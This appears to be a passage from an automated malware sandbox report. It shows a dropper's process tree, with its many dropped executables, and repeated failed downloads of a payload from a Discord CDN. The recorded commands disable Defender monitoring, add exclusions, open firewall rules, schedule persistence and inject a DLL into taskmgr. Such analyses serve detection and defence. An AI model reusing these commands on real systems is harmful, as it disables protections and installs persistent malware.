PID 2544 wrote to memory of 4548	2544	cmd.exe	106

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\65502a1c719e5ad252a349d9f5b278a415a61f88e8c049d5ff8dc828da36ad7e.exe
"C:\Users\Admin\AppData\Local\Temp\65502a1c719e5ad252a349d9f5b278a415a61f88e8c049d5ff8dc828da36ad7e.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2340
- C:\Users\Admin\AppData\Local\Temp\7zS42925387\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS42925387\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2240
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1080
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue20acc89cbd449e95d.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1540
  - - C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue20acc89cbd449e95d.exe
      Tue20acc89cbd449e95d.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:2456
    - - C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue20acc89cbd449e95d.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue20acc89cbd449e95d.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue20cb62eb1a4cb3a01.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3272
  - - C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue20cb62eb1a4cb3a01.exe
      Tue20cb62eb1a4cb3a01.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1108
    - - C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue20cb62eb1a4cb3a01.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue20cb62eb1a4cb3a01.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:264
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:1608
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2676
      - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe /306-306
        6⤵
        Executes dropped EXE
        Manipulates WinMonFS driver.
        System Location Discovery: System Language Discovery
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2352
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1696
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        7⤵
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4928
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 264 -s 728
        6⤵
        Program crash
        
        PID:2248
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 784
        5⤵
        Program crash
        
        PID:2008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue2032d2e78e3d4a56.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue202def121e32deb35.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue20177cabec2a.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue205ff5cb98.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue2069ccb821.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue207aa8a73892eeac.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue2089e53e7fc7158da.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue2042f82e3d3979159.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue20c64a1a28623ee7.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4312
  - - C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue20c64a1a28623ee7.exe
      Tue20c64a1a28623ee7.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue2025487c6c276c3.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue20c0a313caa25872.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1356
  - - C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue20c0a313caa25872.exe
      Tue20c0a313caa25872.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4232
    - - C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue20c0a313caa25872.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue20c0a313caa25872.exe" -u
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue2066325c078.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue20cceb49d9a7.exe /mixtwo
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2544
  - - C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue20cceb49d9a7.exe
      Tue20cceb49d9a7.exe /mixtwo
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1108 -ip 1108
1⤵
PID:4212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 264 -ip 264
1⤵
PID:2988

Network

DNS

196.249.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.249.167.52.in-addr.arpa

IN PTR

Response
DNS

88.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.210.23.2.in-addr.arpa

IN PTR

Response

88.210.23.2.in-addr.arpa

IN PTR

a2-23-210-88deploystaticakamaitechnologiescom
DNS

cdn.discordapp.com

Tue20c64a1a28623ee7.exe

Remote address:

8.8.8.8:53

Request

cdn.discordapp.com

IN A

Response

cdn.discordapp.com

IN A

162.159.135.233

cdn.discordapp.com

IN A

162.159.129.233

cdn.discordapp.com

IN A

162.159.133.233

cdn.discordapp.com

IN A

162.159.130.233

cdn.discordapp.com

IN A

162.159.134.233
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:19:45 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=GtrFRXMU7NvlF_KURtArcvVb4U1m9M9I36FInjF9PEk-1734985185-1.0.1.1-Wi4vl21l2L1Na3AyWf1ryOPPT18.drfZYOxLjK2DlRza7R1mic3L2A5wB_CE9RoqRCOiBTaU32Cs0M5PCh7oBA; path=/; expires=Mon, 23-Dec-24 20:49:45 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UrsmjQD2jP0wiQNSf6G7TnDeV0Gp%2FUUdFXTkxD3NtpLBJd6PLJ%2FHYewSl%2F8DbpazEV%2Bv6Ai%2BHd0pjvyOCOK5BMyKWVI8H6EaKpVn2oLeN6DtOLUcbAwGRDitiyA64%2BO9egTaQA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=rlmSpXVVlQPIl6aC3HniT_VEoE76Ha3N_Dtx2z8wdB0-1734985185598-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0c61d95c71ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:19:50 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=6PNYYsJlRChjBWpDAHAhjURTOlXG18kzMOAGz0LPvCM-1734985190-1.0.1.1-dJVU5ru2ZNYnsczXQbWHUhWfihYFB9EOsMhLFIsE_OXerXhqLRdMJXoazzKvfn1kvVNfYqS2I_DbdiDhekxxbQ; path=/; expires=Mon, 23-Dec-24 20:49:50 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i8VuDImVCnYBu4EdfRZ8%2BMkWXCvjHkQNJPEu0jYOn6qEEw3pLUqCW%2F1VXKEsy%2BmSL5w7cW1yVsSSnEc%2BlaxKaHkmPXC9VETD5XlvRGsH9rCc9bgJvexTdhqKbhgyczZjx2WVIw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=j4U8e.of2xoVvIYKkvtMfJQfDCGjeNgDEANAzXgYdcs-1734985190709-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0c81d86671ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:19:55 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=5gAHUL5Cd9dAprasQxosuee.Heg1vIMuMyB8dKkmVeY-1734985195-1.0.1.1-1fp8t973y.lkAmN2T2ZGXkCSM1eLUTGfTNjz3YHH5wes2H52UXTutKq5NqmriOJnQSUNtxtFtTtYFI9KcqzlRg; path=/; expires=Mon, 23-Dec-24 20:49:55 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2F6ApoQRiCt%2ByUilo6RP4%2Bcj%2FjAPqQSlRa11AOKn%2BD1A02rjYqcXLYTUZi%2BQlW4vmwdoyI7sbc1prpz54aq%2BQO3iX%2BqSn3TcXcLSGzKtJRW1BwmNt11AvmLHeR4JbNw6Bnh90w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=FzWO0tNfyKncb67sA7adeR.CEULEkWGxC8qjFXMcE8Y-1734985195784-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0ca18dd771ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:20:00 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=g8fo3TrG4YWu6Na6XO6KySihIdFA9aNSr57YYLzgEPM-1734985200-1.0.1.1-zyGMgo8zI0YURgaEUzZI7ONOlhlgzTno0.zg.toHyRhEYotvqFByHgk8nm9EIJfFsrjp3lqPovCQLQvf_Cv46g; path=/; expires=Mon, 23-Dec-24 20:50:00 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rl0nE7XirICnA1HuuIbaDMgPGlz7uzaQF3UUD2vadk8KCWVdVaWGnpHG%2FOvC8d%2B4iLCCEEkld6uLbGBtrXsnU71tdTArvYbhLr062Fj46XWxglKoZonHWEiQmAy7sv7zLp%2B4jQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=00jeewKXGRahSuVZVb4eTw0I0MuIQy9BG_APEyAzGI4-1734985200854-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0cc14d1c71ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:20:05 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=B3KODZjbr6HBS7uZmHfDghvgMt8gvdXxrsqYyo3bocQ-1734985205-1.0.1.1-JC8qtLckydadPRfJDQm3hHig_pX3f0zGAQe9D3XBhWSYDCM7amV0GK1yKOZxVeZzaGsbfDPytuAa3fbrT8ri2Q; path=/; expires=Mon, 23-Dec-24 20:50:05 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2nbBIBocZVSgjqNbBhWfXCX6hHvEDaMMT%2FcLWxRGGspwtNDkMp4d2cQ1CAzXTT%2BuQTqrE2Oh9oIGYyEBmR6SBSuKHzRAYGE0CUti%2FXZSPXrf50B5B7%2Fpibcv9EEYqgPVKKQqXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=_rS4HvDubz_cS6E3eydXRhcHhleUWxZDgCkz5N6ekq8-1734985205965-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0ce0fecc71ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:20:11 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=fyqsIHPpCSdjxsE8To0c_Y.bSAzlsfrpfhAk7.iO1.A-1734985211-1.0.1.1-66NxTPF8qa.Snt7ov0EmWUSE1N7mzzNCG9u5dOn1fNO52i6zKEKHCRis1mL6Li1Szni1Qr.ITrSvKvcVg5nngA; path=/; expires=Mon, 23-Dec-24 20:50:11 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BrD0Y3GUMMCJuIRb4q76qdOGbuCzAaL6sMAmdkHvrALXRNfvgjChxrcDoJj%2FV9yu%2Br9KswrlrgkRRRqGZQughJlZ4FQ4fXHazTeH%2B9J73y5eP8RELb6q%2FSbsZx2IQEIT4qJmMA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=77EJn1lvCywuozNitZTiSvogVesUDBv7KAx9MCyVMv8-1734985211042-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0d00eff371ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:20:16 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=UAnOyvEPnY3SweSVPTRw2rZa5bjW25ZVgAy1nKQk75o-1734985216-1.0.1.1-WQEEVBnAxvR5sOQDk3bTOTEa0ZMDXj_I.fwYeMXz1F48lC5wzphm0DfKLEPRBhCevrSovrycO6RuF8JjHf0giQ; path=/; expires=Mon, 23-Dec-24 20:50:16 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AylltrPvyt%2B3MpmbNqhICttGH3aqgBQcpvzhAII5UQWghql1XpN3ginseswDnciNpOHn3EOFU5G6JnEpaRyNcGa3nqKKkl0qXZOhjACn5DipP6D9hXQV%2F59635KI5GTQYWWW2A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=w_OtWroQcrHku.bNRGACj_wpIH8f6jKyycOXW_IjP7U-1734985216107-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0d20984871ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:20:21 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=j5SZ21jCP55ydTUlvtjtsZUvz3RN3kB8ZugBREqKifk-1734985221-1.0.1.1-EgC6jpgBonzACaz5SVmiU4Mg0CrZhliS655NRpusNtsd35z0njvyVjE705MUUuRsyLWjplxl1B2xAWPyjeGStA; path=/; expires=Mon, 23-Dec-24 20:50:21 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uCimNfsq%2FjSkj0IdpFRFhIiGjEZ0gj4ZRqfpDMZuqEKk8LvJMvib9yPT5nP41ys%2FDmaKNhjeiDJKedFAkqk87OSYPW0WSeWNuasPkC3W99SLvG%2FBcDBKXVbmddDFxgSk7jEeCA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=90e1s0AgQzh.dl9YQ7tPXgysFmeStKRk6NKJ9mMpr0U-1734985221178-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0d404fc471ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:20:26 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=Bn9nbc5uAIcquCKbMfF7Vr73AsWjxkVO1IPQ8KjvOFc-1734985226-1.0.1.1-PSQChI6i4dGgTn1dPEgCD5cSySekakqaZAR5zrMEm7chmSB0oU9K7fxVajXw5gmrN3.GxkM53jIts_uEslbgfw; path=/; expires=Mon, 23-Dec-24 20:50:26 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G6Ict%2F5DpYvFDN3FDsMksP9ZlOa7tYoI1X7QDbv7InpUrHbH1xIdiFXCGuIbnaKYpSJg8y7J88ZsgsOHJsmhkoe3Z9tunt2xShnWfDw5PDzE%2FVwYa3JKcXd10gRjrwbAsgj9XA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=LRonCK7WuORkUruM4o7RQvp3MkYBksQIU2hFf2iwu2M-1734985226250-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0d5fff0e71ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:20:31 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=7zLZfyQtINyN4GQE9kWnADygPzYwiNpn_J7JuIXkmcM-1734985231-1.0.1.1-eu7ym0JRpeY.o6kI3_8JnQvmkXb1v2z6WJA5Yr09OZAmsgNVAOpMBJ9XHRSUd9dQYqU4O5OpAkqxHxw33ZwOcQ; path=/; expires=Mon, 23-Dec-24 20:50:31 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w6sG2foWiSGXVSzgBY3aCcOjktmB2ca%2BUkABCvL24W0qoBvlI%2BVarI9B0f3d79HbER85unFW4mp5QRSPfe%2FWNG4GHfj338clQSe8%2B%2B0irlVSxqSXX81Tq1YQ8GkOL1COEXZ%2Fww%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=6R7yOY6lV2vnx95dOR3QhpXe2zoL9nuGCSlA4X1Af8A-1734985231330-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0d7fbcb471ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:20:36 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
Set-Cookie: __cf_bm=4Q.DJB8IXGbjUB_.iT_zQCgpaa0.bL.2PIpmhRXdLSY-1734985236-1.0.1.1-91SOdmClXOpnBF3Ph7Uj6CvXQbJ4v9oG8p.yKgfvepV2UlELcfvtgmq6pFi1RZ4PykOH3k.BzUQDj7RlYBBMWw; path=/; expires=Mon, 23-Dec-24 20:50:36 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YN8eMBZVolvBFHSrxvhs%2BGwJNORjksl6OVYMbRqlJhonywLjXHH7SB5jyd8ZVPnJ4C4ICZWi%2BmFaFWA0s5lnOlr3nwm6ZT%2BVFrRmfjtNTS%2FuCiE4MVKXbNolcqK%2Bme%2BGoXqXsA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=Gb2yoNxoJeLSYQ42_He55vl5OtbZxhjRJ1mJ92oB8yk-1734985236397-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0d9f6a8a71ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

Tue20c64a1a28623ee7.exe

Remote address:

162.159.135.233:443

Request

GET /attachments/910281601559167006/912610248508968970/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 23 Dec 2024 20:20:41 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
